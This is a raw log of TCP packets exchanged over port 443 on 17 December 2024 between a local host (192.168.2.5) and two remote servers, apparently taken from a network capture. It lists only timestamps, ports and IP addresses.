Dec 17, 2024 07:21:31.047374010 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.047419071 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.047498941 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.047518015 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.047549009 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.047571898 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.052970886 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.053009987 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.053059101 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.053076982 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.053101063 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.053211927 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.202653885 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.202697992 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.202805996 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.202852964 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.202888966 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.202914000 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.208175898 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.208216906 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.208276033 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.208297014 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.208322048 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.208360910 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.215095997 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.215136051 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.215183020 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.215202093 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.215229034 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.215249062 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.221035004 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.221075058 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.221121073 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.221133947 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.221159935 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.221209049 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.226598024 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.226639032 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.226679087 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.226686001 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.226700068 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.226726055 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.233361959 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.233402014 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.233438015 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.233447075 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.233460903 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.233488083 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.238989115 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.239029884 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.239064932 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.239072084 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.239089012 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.239109039 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.245402098 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.245440960 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.245475054 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.245481968 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.245496988 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.245518923 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.394824982 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.394877911 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.395442009 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.395471096 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.395539045 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.400379896 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.400422096 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.400468111 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.400481939 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.400510073 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.400528908 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.406821966 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.406862974 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.406933069 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.406946898 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.406976938 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.406996012 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.413188934 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.413229942 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.413266897 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.413279057 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.413325071 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.413347960 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.419548988 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.419589043 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.419625044 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.419636965 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.419665098 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.419687986 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.421880007 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.421953917 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.427520990 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.427561045 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.427594900 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.427613974 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.427642107 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.433931112 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.433979988 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.434006929 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.434020996 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.434055090 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.483278990 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.583792925 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.583853960 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.583884001 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.583899975 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.583935022 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.583946943 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.589610100 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.589652061 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.589690924 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.589703083 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.589721918 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.589751005 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.595139980 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.595206022 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.595246077 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.595273018 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.595299006 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.595998049 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:31.596070051 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:31.598563910 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:50.093894958 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:50.093933105 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:50.094180107 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:50.094777107 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:50.094794989 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.308636904 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.308764935 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.314299107 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.314321995 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.314553022 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.326121092 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.367353916 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.952889919 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.952955961 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953003883 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953012943 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.953066111 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953138113 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.953413963 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953603029 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953655958 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.953670979 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953763008 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953794956 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953825951 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:51.953841925 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:51.953912020 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.040055037 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.073134899 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.073204994 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.073229074 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.077387094 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.077455044 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.077472925 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.093949080 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.094010115 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.094028950 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.102391005 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.102458954 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.102473021 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.110734940 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.110800982 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.110810041 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.119126081 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.119184017 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.119191885 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.127501965 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.127563953 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.127593994 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.136204004 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.136275053 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.136290073 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.144610882 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.144679070 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.144692898 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.186451912 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.186471939 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.202960014 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.203041077 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.203059912 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.208184958 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.208252907 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.208266973 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.216444016 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.216532946 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.216552973 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.216567993 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.216625929 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.225034952 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.233357906 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.233422995 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.233436108 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.249907017 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.249984026 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.249995947 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.250058889 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.266836882 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.266856909 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.266922951 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.275068045 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.275151014 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.275171995 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.283907890 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.284002066 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.284023046 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.284080982 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.315802097 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.315839052 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.315893888 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.322727919 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.322803020 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.322820902 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.323499918 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.329125881 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.329199076 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.333323956 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.333403111 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.340925932 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.340992928 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.348531961 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.348650932 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.353424072 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.353485107 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.361526012 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.361644030 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.370193958 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.370270014 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.372030973 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.372098923 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.380656004 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.380733967 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.388695002 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.388777971 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.395123959 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.395221949 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.403841019 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.403918028 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.405672073 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.405772924 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.413902998 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.413981915 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.437357903 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.437443972 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.443448067 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.443547010 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.446655989 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.446732998 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.452887058 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.452969074 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.458396912 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.458472967 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.464338064 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.464423895 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.466470957 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.466526031 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.471822977 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.471888065 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.474179983 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.474241972 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.478962898 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.479023933 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.483439922 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.483508110 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.488065004 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.488137007 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.490374088 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.490442038 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.494595051 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.494662046 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.496681929 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.496750116 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.500943899 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.501024961 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.519990921 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.520057917 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.522670031 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.522742033 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.525084972 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.525146961 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.528646946 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.528763056 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.537224054 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.537234068 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.537272930 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.537305117 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.537328959 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.537364006 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.547066927 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.547086954 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.547154903 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.547177076 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.558636904 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.558655977 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.558738947 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.558763981 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.569538116 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.569556952 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.569628954 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.569636106 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.579644918 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.579664946 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.579736948 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.579756021 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.590164900 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.590184927 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.590261936 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.590270996 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.599029064 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.599047899 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.599132061 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.599140882 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.655339003 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.715274096 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.715295076 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.715332985 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.715373039 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.715550900 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.715595007 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.715832949 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.719368935 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.719379902 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.719403982 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.719445944 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.719461918 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.719491959 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.719536066 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.724169970 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.724191904 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.724275112 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.724275112 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.724299908 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.724351883 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.726116896 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.726202011 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.726213932 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.726238012 CET	443	49760	104.21.84.67	192.168.2.5
Dec 17, 2024 07:21:52.726270914 CET	49760	443	192.168.2.5	104.21.84.67
Dec 17, 2024 07:21:52.726294041 CET	49760	443	192.168.2.5	104.21.84.67
